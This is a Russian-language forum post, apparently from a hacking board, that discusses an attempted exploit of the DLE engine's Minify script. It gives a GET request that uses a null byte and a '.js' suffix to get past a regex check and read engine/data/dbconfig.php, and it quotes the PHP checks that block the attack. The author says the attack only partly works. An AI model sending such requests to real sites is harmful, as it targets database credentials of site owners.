В общем, по последней дырке такая песня:
Запрос (GET):
Код HTML:
/engine/classes/min/index.php?f=engine/data/dbconfig.php
Обработчик, который всё обламывает:
engine\classes\min\lib\Minify\Controller\MinApp.ph p
А конкретно две проверки:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^[^,]+\\.(css|js)(?:,[^,]+\\.\\1)*$/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]])[/COLOR][/COLOR]
и
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]realpath[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
Судя по описанию патча с целсофта запрос должен быть примерно такой:
Код HTML:
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
Регулярка обеспечивается .js, путь null byte..
описание атаки
Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....
Так что это так, больше для развития, или пока не убьёшь эти файлы.
PS и ещё не получается обойти проверку (обратный слэш):
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
PSPS И самое интересное: гугл уже в июле
это обсуждал ... Участники группы так и не смогли заюзать уязвимость